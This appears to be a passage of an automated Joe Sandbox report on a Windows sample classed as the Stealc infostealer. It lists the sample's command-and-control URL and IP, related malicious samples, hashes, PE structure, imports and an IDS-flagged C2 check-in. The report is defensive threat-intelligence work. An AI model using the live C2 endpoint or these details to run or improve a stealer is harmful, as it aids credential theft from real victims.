                          http://62.204.41.177/edd20096ecef326d.php4cdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://62.204.41.177/edd20096ecef326d.phptcdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              http://62.204.41.177Ecdc57Mn7dE.exe, 00000000.00000002.1585294309.000000000082E000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://62.204.41.177/edd20096ecef326d.phpUcdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://62.204.41.177/edd20096ecef326d.phpucdc57Mn7dE.exe, 00000000.00000002.1585368531.00000000008BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://62.204.41.177/9cdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      http://upx.sf.netAmcache.hve.15.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      http://62.204.41.177/owscdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        http://62.204.41.177vcdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          http://62.204.41.177/edd20096ecef326d.phpTQcdc57Mn7dE.exe, 00000000.00000002.1585368531.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            http://62.204.41.177cdc57Mn7dE.exe, 00000000.00000002.1585294309.000000000082E000.00000004.00000020.00020000.00000000.sdmp, cdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmptrue
                                              unknown
                                              http://62.204.41.177/Fcdc57Mn7dE.exe, 00000000.00000002.1585368531.0000000000865000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                62.204.41.177
                                                unknownUnited Kingdom
                                                30798TNNET-ASTNNetOyMainnetworkFItrue
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1542567
                                                Start date and time:2024-10-26 00:57:52 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 4m 26s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:23
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:cdc57Mn7dE.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:07f591a17c73af012377a73b06a11b66.exe
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@2/5@0/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 23
                                                • Number of non-executed functions: 165
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, WerFault.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                • Not all processes where analyzed, report is missing behavior information
                                                • VT rate limit hit for: cdc57Mn7dE.exe
                                                TimeTypeDescription
                                                20:39:47API Interceptor1x Sleep call for process: WerFault.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                62.204.41.177v2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                v32oH5Xhqw.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177/edd20096ecef326d.php
                                                No context
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                TNNET-ASTNNetOyMainnetworkFIv2hvYA53Ys.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                5ee78ca100f37486e25795012e502d905d864fe4dedf0.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                Zl5QaBwsTJ.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                sgM0Akbldk.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                VAIIBIHmtT.exeGet hashmaliciousStealcBrowse
                                                • 62.204.41.177
                                                v32oH5Xhqw.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.177
                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                • 217.112.243.186
                                                NK3SASJheq.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.176
                                                jqLt8WnO6C.exeGet hashmaliciousStealc, VidarBrowse
                                                • 62.204.41.176
                                                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                                • 217.112.243.125
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):0.9630615514913606
                                                Encrypted:false
                                                SSDEEP:96:A1GYY7sOhs07pnMQXIDcQ6c6vPcEtcw37gA+HbHg/opAnQr39DDWpsOyP6N+mtZ/:YY7l0EjnajSXZrMZtzuiF0Z24IO8q
                                                MD5:0701746C1DB4FD25A17696BFFC857530
                                                SHA1:CDE9F8C10364FED59995C92A7D648A1F99BCC669
                                                SHA-256:9DB6744CF8564AF4F939865F613CB70145AEC57D52B97AC6F4A0647704B20689
                                                SHA-512:7A8B39F3ECBE64ED0F25BADC2832D00D811473BA1F0B7DC13545E5180FE392A09DED2EE415C7528B1299367C033267A0DEE74F8B3ACC2F9C53AABA3AA4DEA438
                                                Malicious:true
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.4.3.7.0.7.3.2.8.9.4.2.5.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.4.3.7.0.7.3.3.5.8.1.4.7.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.9.c.0.7.0.d.-.2.f.3.8.-.4.2.9.d.-.a.c.2.f.-.f.6.f.2.d.3.6.9.b.6.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.f.e.f.7.d.5.-.e.5.4.c.-.4.e.8.c.-.8.8.6.6.-.1.b.f.e.d.9.1.f.6.b.5.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.c.d.c.5.7.M.n.7.d.E...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.3.c.-.0.0.0.1.-.0.0.1.4.-.e.0.4.4.-.0.7.7.1.3.1.2.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.b.f.1.c.7.6.8.7.a.4.e.9.8.e.d.0.7.3.7.1.f.c.5.b.8.6.0.a.0.9.0.0.0.0.f.f.f.f.!.0.0.0.0.c.3.4.7.9.c.3.c.6.6.b.8.2.a.3.8.4.0.f.d.7.1.b.0.a.7.f.1.2.7.2.2.f.f.0.e.1.4.0.9.!.c.d.c.5.7.M.n.7.d.E...e.x.e.....T.a.r.g.e.t.A.p.p.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.451890683129158
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsnJg77aI9XCSSWpW8VYkYm8M4JVcFvByS+q8aSYNlAtyd:uIjfJI7FCs7VAJs2Y0tyd
                                                MD5:2DAB51AA45EAF780C0C74C80E02059DA
                                                SHA1:0EEECEF3605738CCEE386938DE82F3E49A1586CA
                                                SHA-256:94B966EA993FB93B78FE8DC3808FBBE826B49A9803BB4F33A30A081756D2B5CA
                                                SHA-512:BB621BBAC8F0CF30700823CA0EF95E62B2E4D6846568F2E55B927AD93E4D6DFA365BE4784433AECAA190523D85A688A4DFCD55359D9570A2E9A888ECE0FBDAB7
                                                Malicious:false
                                                Reputation:low
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="559561" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8328
                                                Entropy (8bit):3.6972800438086346
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJks6Xz6YNWSU9Tu9gmfHKpDq89b7GsfkJm:R6lXJ/6D6YsSU9K9gmfHU7lf3
                                                MD5:7B914FCE23FD8F382C306C106AE99DD0
                                                SHA1:3AEA02A18A2AE9446F15C64B3885F2BA4DF6AEB2
                                                SHA-256:BB5BD0B6AD6665D4527545D9E92A9265508CB66667D1C22D355A47DECC3C5A24
                                                SHA-512:726615D3D5B7FBAD86710BEFF5D12844DBE9D61C90B882C8E67E9DA43CD47431E046669828435C71B610461DC5393DD4AEBB3C6B64B9B6E6771480AF4B01879C
                                                Malicious:false
                                                Reputation:low
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.<./.P.i.d.>.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Fri Oct 25 22:58:53 2024, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):60488
                                                Entropy (8bit):1.9060634597412713
                                                Encrypted:false
                                                SSDEEP:192:Izf1X4YBgFE0lXKOEOJwpbuKebHTWAOXBe0IW0A8uqhS1fx/KKamMdO3DsOm:stBgFDTEEMuKeLUd8u/7DjJm
                                                MD5:7B64B5DEF358D15C44B7DCD13D5F1A0D
                                                SHA1:ED8E20DAD6F24DF0E322EB47EAA8050346D3B5E5
                                                SHA-256:F7C59B82F1E4F007BE8E2770AD3216021167242384F531FD9710381197A2EB09
                                                SHA-512:8893DD2363650658EC2903B651CCDED7C77C93F6AEDF326470255A42AA681BC3AB1EED1A2571D1EB41242516BC38A311D960B60C014E5E1AFABAD4E7BE63C460
                                                Malicious:false
                                                Reputation:low
                                                Preview:MDMP..a..... ........".g............4...............<............*..........T.......8...........T............2..p.......................................................................................................eJ......H.......GenuineIntel............T.......<....".g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:MS Windows registry file, NT/2000 or above
                                                Category:dropped
                                                Size (bytes):1835008
                                                Entropy (8bit):4.416641203657082
                                                Encrypted:false
                                                SSDEEP:6144:Qcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNz5+:1i58oSWIZBk2MM6AFBRo
                                                MD5:30A94E35FC7B6D499E711F595818DE4D
                                                SHA1:8AE8E04B241305450EDD9624BDC1B39003C7D359
                                                SHA-256:405042A9D10FEBA50F70F6CDD7935794D9255D77B58DD830D49883E8BA3DA263
                                                SHA-512:1AAB0CF197B5016633FB0C59B61B588F45712C8D8B85C5F2A40DE1F3CD01EF39B178AB55EAA883BE5D59088AFA9F9D666A6EB1BFA69486399000F73E13A214E0
                                                Malicious:false
                                                Reputation:low
                                                Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..,v1'................................................................................................................................................................................................................................................................................................................................................;B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):6.7659118470339
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:cdc57Mn7dE.exe
                                                File size:352'768 bytes
                                                MD5:07f591a17c73af012377a73b06a11b66
                                                SHA1:c3479c3c66b82a3840fd71b0a7f12722ff0e1409
                                                SHA256:2fdf8af0479059cbd78914ef60be72d7c4527ceb3e893304d350a8b6dc9bd9bc
                                                SHA512:a7f3b85620b55b7bc40b9e6313b7ab326c9d9979677e1414224b8b5a9c9ab2365449fb84272efbd59308c2ee0b29fe1535e5bfd721f223cfd975d439d27c79b8
                                                SSDEEP:6144:/g1VWTJplmO0AiK9/GMSGFoF8lPIS4AiXNV65UGDz:MVWTl7VRP5FS43kXr65UGD
                                                TLSH:BA749DD1A9F28463F7F34AB85A7096F81A7FBC67A930834E1623268E3D713918D15713
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}\]...]...].......\...C...A...C...L...C.......zRh.Z...]...!...C...\...C...\...C...\...Rich]...........PE..L.....Ae...........
                                                Icon Hash:151a111111901009
                                                Entrypoint:0x4016ea
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:TERMINAL_SERVER_AWARE
                                                Time Stamp:0x6541178D [Tue Oct 31 15:04:45 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:2d2b48fd60d7f0264d6ec6db121e9a1d
                                                Instruction
                                                call 00007F4FFC55D458h
                                                jmp 00007F4FFC559DEDh
                                                mov edi, edi
                                                push ebp
                                                mov ebp, esp
                                                sub esp, 00000328h
                                                mov dword ptr [0043D478h], eax
                                                mov dword ptr [0043D474h], ecx
                                                mov dword ptr [0043D470h], edx
                                                mov dword ptr [0043D46Ch], ebx
                                                mov dword ptr [0043D468h], esi
                                                mov dword ptr [0043D464h], edi
                                                mov word ptr [0043D490h], ss
                                                mov word ptr [0043D484h], cs
                                                mov word ptr [0043D460h], ds
                                                mov word ptr [0043D45Ch], es
                                                mov word ptr [0043D458h], fs
                                                mov word ptr [0043D454h], gs
                                                pushfd
                                                pop dword ptr [0043D488h]
                                                mov eax, dword ptr [ebp+00h]
                                                mov dword ptr [0043D47Ch], eax
                                                mov eax, dword ptr [ebp+04h]
                                                mov dword ptr [0043D480h], eax
                                                lea eax, dword ptr [ebp+08h]
                                                mov dword ptr [0043D48Ch], eax
                                                mov eax, dword ptr [ebp-00000320h]
                                                mov dword ptr [0043D3C8h], 00010001h
                                                mov eax, dword ptr [0043D480h]
                                                mov dword ptr [0043D37Ch], eax
                                                mov dword ptr [0043D370h], C0000409h
                                                mov dword ptr [0043D374h], 00000001h
                                                mov eax, dword ptr [0043C004h]
                                                mov dword ptr [ebp-00000328h], eax
                                                mov eax, dword ptr [0043C008h]
                                                mov dword ptr [ebp-00000324h], eax
                                                call dword ptr [000000FCh]
                                                Programming Language:
                                                • [C++] VS2008 build 21022
                                                • [ASM] VS2008 build 21022
                                                • [ C ] VS2008 build 21022
                                                • [IMP] VS2005 build 50727
                                                • [RES] VS2008 build 21022
                                                • [LNK] VS2008 build 21022
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x3a8bc0x50.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x11c0000x17d10.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x390000x1b8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x372600x37400473e02b8c4373d20bf58e335c40fddd9False0.8356679510746606data7.488896312767425IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x390000x22cc0x2400183d480a745f8e9cdfd4f0ddac46d596False0.3640407986111111data5.490494477185613IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x3c0000xdf67c0x48008505865831daab3fe511d6c1347172a6False0.051432291666666664data0.6163622935606622IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x11c0000x144d100x17e00abf9af9077254382041c8de74e5b7b4bFalse0.4714802846858639data5.174120516819205IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_CURSOR0x12dbd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                RT_ICON0x11c8e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkishTurkey0.5613006396588486
                                                RT_ICON0x11d7880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6371841155234657
                                                RT_ICON0x11e0300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.6779953917050692
                                                RT_ICON0x11e6f80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7420520231213873
                                                RT_ICON0x11ec600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5035269709543568
                                                RT_ICON0x1212080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.5987335834896811
                                                RT_ICON0x1222b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.5967213114754099
                                                RT_ICON0x122c380x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.7349290780141844
                                                RT_ICON0x1231180xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.392590618336887
                                                RT_ICON0x123fc00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.5451263537906137
                                                RT_ICON0x1248680x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.6111751152073732
                                                RT_ICON0x124f300x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.6394508670520231
                                                RT_ICON0x1254980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.41322701688555347
                                                RT_ICON0x1265400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.40491803278688526
                                                RT_ICON0x126ec80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.44769503546099293
                                                RT_ICON0x1273980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TurkishTurkey0.3440831556503198
                                                RT_ICON0x1282400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TurkishTurkey0.46886281588447654
                                                RT_ICON0x128ae80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TurkishTurkey0.4988479262672811
                                                RT_ICON0x1291b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TurkishTurkey0.5245664739884393
                                                RT_ICON0x1297180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TurkishTurkey0.42479253112033194
                                                RT_ICON0x12bcc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TurkishTurkey0.4348030018761726
                                                RT_ICON0x12cd680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TurkishTurkey0.43401639344262294
                                                RT_ICON0x12d6f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TurkishTurkey0.4521276595744681
                                                RT_STRING0x12ded00x1a4data0.4880952380952381
                                                RT_STRING0x12e0780x512data0.44298921417565484
                                                RT_STRING0x12e5900x4fedata0.4514866979655712
                                                RT_STRING0x12ea900x4d4data0.441747572815534
                                                RT_STRING0x12ef680x680data0.4308894230769231
                                                RT_STRING0x12f5e80x6d0data0.42660550458715596
                                                RT_STRING0x12fcb80x70adata0.42730299667036625
                                                RT_STRING0x1303c80x7e4data0.4153465346534653
                                                RT_STRING0x130bb00x7b2data0.41776649746192895
                                                RT_STRING0x1313680x654data0.43703703703703706
                                                RT_STRING0x1319c00x7dedata0.4200595829195631
                                                RT_STRING0x1321a00x6bcdata0.43735498839907194
                                                RT_STRING0x1328600x736data0.42524377031419286
                                                RT_STRING0x132f980x7cadata0.4202607823470411
                                                RT_STRING0x1337680x5a2data0.43828016643550627
                                                RT_GROUP_CURSOR0x12dd000x14data1.15
                                                RT_GROUP_ICON0x12db580x76dataTurkishTurkey0.6694915254237288
                                                RT_GROUP_ICON0x1230a00x76dataTurkishTurkey0.6610169491525424
                                                RT_GROUP_ICON0x1273300x68dataTurkishTurkey0.7115384615384616
                                                RT_VERSION0x12dd180x1b4data0.5825688073394495
                                                DLLImport
                                                KERNEL32.dllGetNumaProcessorNode, GetLocaleInfoA, MoveFileExA, CallNamedPipeA, InterlockedIncrement, SetDefaultCommConfigW, GetEnvironmentStringsW, GlobalLock, GetTimeFormatA, SetCommBreak, FreeEnvironmentStringsA, GetModuleHandleW, FormatMessageA, GetConsoleCP, FatalAppExitW, CopyFileW, GetSystemWow64DirectoryW, GetVersionExW, DeleteVolumeMountPointW, HeapCreate, GetNamedPipeInfo, GetConsoleAliasW, GetFileAttributesW, GetBinaryTypeA, GetModuleFileNameW, GetNumaNodeProcessorMask, GetStringTypeExA, LCMapStringA, GetStdHandle, SetLastError, lstrcmpiA, GetProcAddress, GetLongPathNameA, MoveFileW, BuildCommDCBW, LoadLibraryA, UnhandledExceptionFilter, InterlockedExchangeAdd, OpenWaitableTimerW, LocalAlloc, SetCalendarInfoW, WritePrivateProfileStringA, SetCommMask, GetOEMCP, SetConsoleTitleW, FindAtomW, ReadConsoleOutputCharacterW, OpenFileMappingA, LocalFree, LocalFileTimeToFileTime, GetConsoleFontSize, GetComputerNameA, CloseHandle, WriteConsoleW, HeapAlloc, MultiByteToWideChar, GetCommandLineA, GetStartupInfoA, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapReAlloc, Sleep, ExitProcess, WriteFile, GetModuleFileNameA, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, GetLastError, InterlockedDecrement, HeapSize, GetCPInfo, GetACP, IsValidCodePage, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, GetConsoleMode, FlushFileBuffers, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, CreateFileA
                                                ADVAPI32.dllQueryServiceLockStatusW
                                                WINHTTP.dllWinHttpOpenRequest
                                                Language of compilation systemCountry where language is spokenMap
                                                TurkishTurkey
                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                2024-10-26T00:58:52.463066+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.74969962.204.41.17780TCP
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 26, 2024 00:58:50.283024073 CEST4969980192.168.2.762.204.41.177
                                                Oct 26, 2024 00:58:50.288501978 CEST804969962.204.41.177192.168.2.7
                                                Oct 26, 2024 00:58:50.288623095 CEST4969980192.168.2.762.204.41.177
                                                Oct 26, 2024 00:58:50.293545961 CEST4969980192.168.2.762.204.41.177
                                                Oct 26, 2024 00:58:50.300139904 CEST804969962.204.41.177192.168.2.7
                                                Oct 26, 2024 00:58:51.176397085 CEST804969962.204.41.177192.168.2.7
                                                Oct 26, 2024 00:58:51.176465034 CEST4969980192.168.2.762.204.41.177
                                                Oct 26, 2024 00:58:51.183470964 CEST4969980192.168.2.762.204.41.177
                                                Oct 26, 2024 00:58:51.188733101 CEST804969962.204.41.177192.168.2.7
                                                Oct 26, 2024 00:58:52.462999105 CEST804969962.204.41.177192.168.2.7
                                                Oct 26, 2024 00:58:52.463066101 CEST4969980192.168.2.762.204.41.177
